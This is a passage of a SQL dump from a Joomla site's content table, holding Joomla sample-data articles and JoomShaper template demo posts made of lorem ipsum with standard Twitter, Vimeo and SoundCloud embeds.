00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,1,'','',1,4,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(50,148,'Upgraders','upgraders','<p>If you are an experienced Joomla! user, this Joomla site will seem very familiar but also very different. The biggest change is the new administrator interface and the adoption of responsive design. Hundreds of other improvements have been made.</p>\r\n<p> </p>\r\n<p> </p>','',-2,19,'2011-01-01 00:00:01',692,'Joomla','2012-09-25 07:12:10',123,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"info_block_position\":\"0\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,6,'','',1,3,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(52,150,'Users','users-component','<p>The users extension lets your site visitors register, login and logout, change their passwords and other information, and recover lost passwords. In the administrator it allows you to create, block and manage users and create user groups and access levels. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help31:Users_User_Manager\">Help</a></p>\r\n<p>Please note that some of the user views will not display if you are not logged-in to the site.</p>','',-2,21,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\"}',1,5,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(53,151,'Using Joomla!','using-joomla','<p>With Joomla you can create anything from a simple personal website to a complex ecommerce or social site with millions of visitors.</p>\r\n<p>This section of the sample data provides you with a brief introduction to Joomla concepts and reference material to help you understand how Joomla works.</p>\r\n<p><em>When you no longer need the sample data, you can can simply unpublish the sample data category found within each extension in the site administrator or you may completely delete each item and all of the categories. </em></p>','',-2,19,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,7,'','',1,9,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(60,158,'News Feeds','news-feeds','<p>News Feeds (com_newsfeeds) provides a way to organize and present news feeds. News feeds are a way that you present information from another site on your site. For example, the joomla.org website has numerous feeds that you can incorporate on your site. You an use menus to present a single feed, a list of feeds in a category, or a list of all feed categories. <a href=\"http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help31:Components_Newsfeeds_Feeds\">Help</a></p>','',-2,21,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":\"\",\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":\"\",\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":\"\",\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,4,'','',1,8,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(67,168,'What\'s New in 1.5?','whats-new-in-15','<p>This article deliberately archived as an example.</p><p>As with previous releases, Joomla! provides a unified and easy-to-use framework for delivering content for Web sites of all kinds. To support the changing nature of the Internet and emerging Web technologies, Joomla! required substantial restructuring of its core functionality and we also used this effort to simplify many challenges within the current user interface. Joomla! 1.5 has many new features.</p>\r\n<p style=\"margin-bottom: 0in;\">In Joomla! 1.5, you\'\'ll notice:</p>\r\n<ul>\r\n<li>Substantially improved usability, manageability, and scalability far beyond the original Mambo foundations</li>\r\n<li>Expanded accessibility to support internationalisation, double-byte characters and right-to-left support for Arabic, Farsi, and Hebrew languages among others</li>\r\n<li>Extended integration of external applications through Web services</li>\r\n<li>Enhanced content delivery, template and presentation capabilities to support accessibility standards and content delivery to any destination</li>\r\n<li>A more sustainable and flexible framework for Component and Extension developers</li>\r\n<li>Backward compatibility with previous releases of Components, Templates, Modules, and other Extensions</li>\r\n</ul>','',2,9,'2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2011-01-01 00:00:01','0000-00-00 00:00:00','','','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_readmore\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"page_title\":\"\",\"alternative_readmore\":\"\",\"layout\":\"\"}',1,0,'','',1,0,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(71,195,'Doner spare ribs pastrami shank','doner-spare-ribs-pastrami-shank','<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.</p>\r\n','\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>',-2,79,'2015-02-02 18:56:08',692,'','2015-02-02 20:27:55',864,0,'0000-00-00 00:00:00','2015-02-02 18:56:08','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"status\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"<blockquote class=\\\"twitter-tweet\\\" lang=\\\"en\\\"><p>Published a new blog entry One Month Extra for all JoomShaper Members in News. <a href=\\\"http:\\/\\/t.co\\/2pQYdykKy8\\\">http:\\/\\/t.co\\/2pQYdykKy8<\\/a><\\/p>— JoomShaper (@joomshaper) <a href=\\\"https:\\/\\/twitter.com\\/joomshaper\\/status\\/562210375480139777\\\">February 2, 2015<\\/a><\\/blockquote>\\r\\n<script async src=\\\"\\/\\/platform.twitter.com\\/widgets.js\\\" charset=\\\"utf-8\\\"><\\/script>\"}',4,6,'','',1,19,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(72,196,'Jerky shank chicken boudin','jerky-shank-chicken-boudin','<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.</p>\r\n','\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>',-2,79,'2015-02-02 20:29:50',692,'','2015-02-02 20:41:51',864,0,'0000-00-00 00:00:00','2015-02-02 20:29:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"video\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"http:\\/\\/vimeo.com\\/43426940\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',4,5,'','',1,30,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(73,197,'Portable sales devices making a difference.','portable-sales-devices-making-a-difference','<p><img class=\"pull-left\" src=\"images/images-06.jpg\" alt=\"\" /> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>','',1,79,'2015-02-02 20:29:50',692,'','2016-02-28 11:16:17',692,0,'0000-00-00 00:00:00','2015-02-02 20:29:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',9,6,'','',1,97,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(74,198,'The salesman is dead. Long live the salesman.','the-salesman-is-dead-long-live-the-salesman','<p><img class=\"pull-left\" src=\"images/images-02.jpg\" alt=\"\" /> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>','',1,79,'2015-02-02 20:29:50',692,'','2016-02-28 11:16:12',692,0,'0000-00-00 00:00:00','2015-02-02 20:29:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"{\\\"gallery_images\\\":[\\\"images\\/blog\\/blog06.jpg\\\",\\\"images\\/blog\\/blog05.jpg\\\",\\\"images\\/blog\\/blog04.jpg\\\"]}\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',8,5,'','',1,38,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(75,199,'5 Effective Email Unsubscribe Pages.','5-effective-email-unsubscribe-pages','<p><img class=\"pull-left\" src=\"images/images-03.jpg\" alt=\"\" /> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>','',1,79,'2015-02-02 20:29:50',692,'','2016-02-28 11:16:08',692,0,'0000-00-00 00:00:00','2015-02-02 20:29:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"<iframe width=\\\"100%\\\" height=\\\"450\\\" scrolling=\\\"no\\\" frameborder=\\\"no\\\" src=\\\"https:\\/\\/w.soundcloud.com\\/player\\/?url=https%3A\\/\\/api.soundcloud.com\\/tracks\\/28830162&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&visual=true\\\"><\\/iframe>\",\"video\":\"\",\"link_title\":\"\",\"link_url\":\"\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',10,4,'','',1,25,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(76,200,'Who Actually Clicks on Banner Ads?','who-actually-clicks-on-banner-ads','<p><img class=\"pull-left\" src=\"images/images-04.jpg\" alt=\"\" /> Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus.</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.</p>\r\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus</p>','',1,79,'2015-02-02 20:29:50',692,'','2016-02-28 11:16:04',692,0,'0000-00-00 00:00:00','2015-02-02 20:29:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\",\"post_format\":\"standard\",\"gallery\":\"\",\"audio\":\"\",\"video\":\"\",\"link_title\":\"Responive Joomla Templates\",\"link_url\":\"http:\\/\\/www.joomshaper.com\\/joomla-templates\",\"quote_text\":\"\",\"quote_author\":\"\",\"post_status\":\"\"}',8,3,'','',1,39,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(77,201,'Why we all need to be connected.','why-we-all-need-to-be-connected','<p><img 